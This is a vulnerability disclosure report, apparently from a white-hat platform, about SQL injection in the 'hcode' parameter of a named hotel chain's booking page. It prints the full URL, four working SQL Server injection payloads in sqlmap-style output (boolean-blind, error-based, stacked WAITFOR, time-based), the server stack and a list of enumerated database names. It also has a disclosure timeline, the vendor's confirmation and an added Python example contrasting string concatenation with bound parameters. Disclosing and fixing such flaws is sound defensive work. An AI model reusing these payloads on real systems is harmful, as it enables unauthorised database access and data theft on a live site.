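2014-03-03: Details reported to the vendor; awaiting vendor handling
2014-03-05: Vendor confirmed; details disclosed to the vendor only
2014-03-15: Details disclosed to core white hats and relevant domain experts
2014-03-25: Details disclosed to regular white hats
2014-04-04: Details disclosed to intern white hats
2014-04-17: Details disclosed to the public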
Found another one...
Here is the URL directly:
http://www.hnahotelsandresorts.com/destinations/select.aspx?hid=24&id=25&ArrivalTime=2014-02-27&DepartureTime=2014-02-28&fangshuliang=1&renjian=1&hcode=bjsjs
The hcode parameter is injectable.
Place: GET
Parameter: hcode
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: hid=24&id=25&ArrivalTime=2014-02-27&DepartureTime=2014-02-28&fangshuliang=1&renjian=1&hcode=bjsjs' AND 8537=8537 AND 'Rgpx'='Rgpx

    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: hid=24&id=25&ArrivalTime=2014-02-27&DepartureTime=2014-02-28&fangshuliang=1&renjian=1&hcode=bjsjs' AND 2259=CONVERT(INT,(SELECT CHAR(113)+CHAR(116)+CHAR(99)+CHAR(105)+CHAR(113)+(SELECT (CASE WHEN (2259=2259) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(97)+CHAR(103)+CHAR(102)+CHAR(113))) AND 'rMRV'='rMRV

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: hid=24&id=25&ArrivalTime=2014-02-27&DepartureTime=2014-02-28&fangshuliang=1&renjian=1&hcode=bjsjs'; WAITFOR DELAY '0:0:5'--

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: hid=24&id=25&ArrivalTime=2014-02-27&DepartureTime=2014-02-28&fangshuliang=1&renjian=1&hcode=bjsjs' WAITFOR DELAY '0:0:5'--
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
[*] GPweb1_en
[*] GPweb_cs
[*] GroupWebDB
[*] GSTS
[*] master
[*] model
[*] msdb
[*] NBCRS
[*] OTADB
[*] PMS
[*] ReportServer
[*] ReportServerTempDB
[*] RMS
[*] TangoReport
[*] tempdb
Filter,
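One way to close this class of bug, shown as an added example that is not part of the original report or the vendor's code: the same lookup written with string concatenation and with a bound parameter, run against the boolean-based payload quoted above. An in-memory SQLite table stands in for the SQL Server back end; the table, its rows, the function names and the assumed hcode format are all constructed for illustration.

```python
import re
import sqlite3

# Boolean-based blind payload for hcode, copied from the report.
PAYLOAD = "bjsjs' AND 8537=8537 AND 'Rgpx'='Rgpx"

# Assumed hcode format (lowercase letters/digits), inferred from "bjsjs".
HCODE_RE = re.compile(r"[a-z0-9]{1,16}")


def make_db():
    """Constructed stand-in table; the real schema is not in the report."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE hotels (hcode TEXT PRIMARY KEY, name TEXT)")
    db.executemany(
        "INSERT INTO hotels VALUES (?, ?)",
        [("bjsjs", "Hotel A (constructed)"), ("hkxyz", "Hotel B (constructed)")],
    )
    return db


def lookup_concatenated(db, hcode):
    """Vulnerable pattern: the request value becomes part of the SQL text."""
    sql = "SELECT name FROM hotels WHERE hcode = '" + hcode + "'"
    return [row[0] for row in db.execute(sql)]


def lookup_bound(db, hcode):
    """Bound parameter: the value is compared as data, never parsed as SQL."""
    sql = "SELECT name FROM hotels WHERE hcode = ?"
    return [row[0] for row in db.execute(sql, (hcode,))]


def lookup_hardened(db, hcode):
    """Allowlist check first (rejects early, easy to log), then bind."""
    if not HCODE_RE.fullmatch(hcode):
        raise ValueError("hcode rejected by allowlist")
    return lookup_bound(db, hcode)


if __name__ == "__main__":
    db = make_db()
    print("concatenated:", lookup_concatenated(db, PAYLOAD))
    print("bound:       ", lookup_bound(db, PAYLOAD))
    print("valid hcode: ", lookup_hardened(db, "bjsjs"))
```

In the ASP.NET application the bound form corresponds to a SqlCommand with a SqlParameter for hcode; filtering alone, without binding, leaves the query text under the caller's control.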
Severity: Medium
Vulnerability Rank: 8
Confirmed at: 2014-03-05 15:41
We will arrange for staff to fix this. Thank you.
None yet